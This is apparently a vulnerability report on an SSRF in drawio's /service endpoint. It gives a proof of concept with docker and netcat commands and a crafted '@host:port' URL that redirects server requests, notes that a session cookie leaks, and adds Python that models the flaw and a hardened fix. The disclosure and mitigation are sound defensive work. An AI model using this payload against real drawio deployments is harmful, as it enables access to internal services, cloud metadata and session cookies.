SSRF in /service endpoint in jgraph/drawio
May 20th 2022
The problem came from this line of code
Run docker-drawio with the following command:
docker run -it --rm --name="draw" -e EXPORT_URL=http://somesite.com -p 8080:8080 -p 8443:8443 jgraph/drawio
If the drawio EXPORT_URL is set to an address without any / after the primary hostname, like http://somesite.com (not like http://somesite.com/), then an attacker can send a request that reaches 127.0.0.1:4431 with a payload like the one in the proof of concept below.
Proof of Concept
- Start the container:
docker run -it --rm --name="draw" -e EXPORT_URL=http://google.com -p 8080:8080 -p 8443:8443 jgraph/drawio
- Run docker ps and get the container ID (called HN below).
- Get a shell in the container and start a listener on the port targeted by the request (the listener port must match the port in the URL):
docker exec -it HN /bin/bash
apt update && apt install netcat && netcat -l 4431
- Go to
http://draio-instance:firstname.lastname@example.org:4431
You can see that the HTTP request has been recorded in the netcat log.
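The trailing-slash condition above and the PoC URL both point at the same mechanism: when the configured base URL is joined to attacker-controlled text by plain string concatenation, a suffix of the form @host:port turns the configured hostname into the userinfo part of the URL and the attacker's host:port into the authority the HTTP client actually connects to. The following is an added example that models that behaviour in Python; it is not drawio's code, and the function names (naive_target, authority, safe_target), the hostname somesite.com and the attacker suffix are constructed for illustration. It also shows the hardened construction, which normalises the trailing slash, joins the suffix as a path, and verifies that the final authority is still the configured one (catching the protocol-relative "//host:port" variant as well).

```python
from urllib.parse import urlsplit, urljoin

# Constructed inputs (not taken from the report): the configured export URL with
# and without a trailing slash, and an attacker-controlled suffix that smuggles
# a "userinfo@host:port" authority into the final URL.
EXPORT_URL_NO_SLASH = "http://somesite.com"
EXPORT_URL_SLASH = "http://somesite.com/"
ATTACKER_SUFFIX = "@127.0.0.1:4431/"


def naive_target(export_url: str, suffix: str) -> str:
    """Hypothetical vulnerable construction: plain string concatenation.

    With no trailing slash on export_url, "http://somesite.com" + "@127.0.0.1:4431/"
    becomes "http://somesite.com@127.0.0.1:4431/", whose host is 127.0.0.1.
    """
    return export_url + suffix


def authority(url: str):
    """Return the (host, port) an HTTP client would actually connect to for url."""
    parts = urlsplit(url)
    return parts.hostname, parts.port


def safe_target(export_url: str, suffix: str) -> str:
    """Hardened construction.

    1. Force a trailing slash so the suffix can only extend the path.
    2. Join the suffix as a relative path reference, not by concatenation.
    3. Verify the resulting authority still equals the configured one; this also
       rejects a protocol-relative suffix such as "//127.0.0.1:4431/", which
       urljoin would otherwise resolve to a new host.
    """
    base = export_url if export_url.endswith("/") else export_url + "/"
    expected = authority(base)
    target = urljoin(base, suffix.lstrip("/"))
    if authority(target) != expected:
        raise ValueError(f"refusing to reach {authority(target)}; expected {expected}")
    return target


if __name__ == "__main__":
    # Vulnerable: the request goes to the attacker's host and port.
    print(naive_target(EXPORT_URL_NO_SLASH, ATTACKER_SUFFIX),
          "->", authority(naive_target(EXPORT_URL_NO_SLASH, ATTACKER_SUFFIX)))
    # Same suffix with a trailing slash on the base: the request stays on somesite.com.
    print(naive_target(EXPORT_URL_SLASH, ATTACKER_SUFFIX),
          "->", authority(naive_target(EXPORT_URL_SLASH, ATTACKER_SUFFIX)))
    # Hardened: the suffix is kept in the path regardless of the configured form.
    print(safe_target(EXPORT_URL_NO_SLASH, ATTACKER_SUFFIX))
    try:
        safe_target(EXPORT_URL_NO_SLASH, "//127.0.0.1:4431/")
    except ValueError as exc:
        print("blocked:", exc)
```

The authority check is the part worth keeping even if the concatenation is fixed: a trailing slash alone does not stop a scheme-relative suffix, and comparing the parsed host and port of the final URL against the configured base is a cheap, allow-list style guard that does not depend on how the suffix was encoded.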
It is a full SSRF. If you need another PoC, I can give you an HTTP logger script that returns some things to the attacker.
Also, I don't know what exactly the JSESSIONID cookie is, but I can receive its content at my public IP after the redirect too!
The impact extends to the contents of all internal HTTP web servers, if they host a file with a short and enumerable name, as well as retrieving cloud metadata, port scanning, and in some special cases achieving RCE.
However, it is an open redirect too.
About the CVSS:
Attack Complexity is High because this vulnerability depends on a specific configuration of EXPORT_URL (no trailing slash after the hostname).
Availability is None.
Confidentiality can be High, as it is a full SSRF.
I think 7.4 is a good score; if you don't agree, please tell me to change it.